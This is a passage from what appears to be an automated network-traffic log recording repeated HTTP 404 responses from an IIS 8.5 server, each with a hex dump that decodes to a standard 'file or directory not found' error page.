65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:18 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:28 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:37 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:47 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:31:58 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:32:08 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 